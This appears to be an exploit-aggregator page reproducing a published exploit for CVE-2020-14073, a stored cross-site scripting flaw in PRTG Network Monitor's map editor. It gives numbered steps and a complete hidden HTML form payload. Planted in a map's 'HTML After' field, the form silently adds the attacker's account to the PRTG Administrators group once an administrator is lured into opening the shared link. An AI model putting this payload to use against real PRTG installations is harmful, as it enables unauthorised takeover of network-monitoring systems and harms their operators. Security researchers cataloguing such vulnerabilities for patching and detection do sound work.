PRTG Network Monitor Cross Site Scripting

CVE Category Price Severity
CVE-2020-14073 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2020-12-03
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.65 0

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

PRTG Network Monitor Cross Site Scripting
# Exploit Title: PRTG Network Monitor - 'maps' Stored XSS
# Date: 2/12/2020
# Exploit Author: Amin Rawah
# Vendor Homepage:
# Software Link:
# Version: x64
# Tested on: Windows 
# CVE : CVE-2020-14073

Since there is a stored XSS affecting 'maps' in the system, a malicious user can escalte his/her privilege to PRTG Administrator.

1- Login to PRTG system and view source code (currentUserId)
2- Create a map, add an element, double click the element and modify the HTML section 'HTML After'
3- In 'HTML After' add the following code:
 <form action="http://<PRTG_SERVER>:8081/editsettings" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="name_" value="PRTG Administrators" />
      <input type="hidden" name="defaulthome_" value="/welcome.htm" />
      <input type="hidden" name="isadgroup" value="0" />
      <input type="hidden" name="adusertype_" value="0" />
      <input type="hidden" name="aduserack_" value="0" />
      <input type="hidden" name="users_" value="1" />
      <input type="hidden" name="users_" value="1" />
      <input type="hidden" name="users__check" value="<currentUserId>|<YOUR_USERNAME>|" />
      <input type="hidden" name="users__check" value="100|PRTG System Administrator|" />
      <input type="hidden" name="id" value="200" />
      <input type="hidden" name="targeturl" value="/systemsetup.htm?tabid=6" />
      <input type="submit" value="Submit request" />
4- Save and share the link with PRTG Administrator.
5- Login with the highest privilege.

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.